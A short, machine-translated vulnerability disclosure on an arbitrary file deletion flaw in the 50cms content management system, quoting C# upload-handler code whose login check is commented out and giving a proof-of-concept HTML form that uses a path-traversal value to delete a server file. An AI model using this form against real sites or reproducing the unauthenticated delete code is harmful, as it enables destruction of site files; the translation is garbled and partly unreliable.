Delete any 50cms File

This open-source CMS has two pages.
You can see the code,
File 1, SingleUpload. ashx

// Check whether the upload operation is performed after Logon
// If (! New ManagePage (). IsAdminLogin ())
//{
// Context. Response. Write ("{msg: 0, msbox: \" Please log on and upload the file again! \"}");
// Return;
//}
To verify whether all the login code has been commented out, follow these steps to obtain information about the deleted file name:

String _ refilepath = context. Request. QueryString ["ReFilePath"]; // get the name of the returned object
String _ delfile = context. Request. Params [_ refilepath];

UpLoad upFiles = new UpLoad ();
String msg = upFiles. fileSaveAs (_ upfile, _ iswater );
// Delete an existing old file
If (! String. IsNullOrEmpty (_ delfile ))
{
String _ filename = Utils. GetMapPath (_ delfile );
If (File. Exists (_ filename ))
{
File. Delete (_ filename );
}
}

Basically, you only need the required permissions and want to delete anything. There is still a piece of code in the middle. It should be noted that the file to be uploaded cannot be blank:
If (_ upfile = null)
{
Context. Response. Write ("{\" msg \ ": 1, \" msbox \ ": \" select the file to upload! \"}");
Return;
}

Based on these structures, we can solve the problem.

File 2, DeleteAlbumFile. ashx, the problem is similar to the above
Proof of vulnerability: <form action = "http://test.50cms.com/tools/SingleUpload.ashx? UpFilePath = FileUpload & ReFilePath = 123 "method =" post "enctype =" MULTIPART/FORM-DATA ">
Select a file: <input type = "file" id = "file" name = "FileUpload"/> <br>
Select path: <input type = "input" name = "123" value = "../KindEditor/asp.net/demo.aspx"/> <br>
<Input type = "submit"/> <br>
</Form>
Compare the following two figures:

 

 

Solution:

Don't let people delete files ...... In addition, you must restrict logon.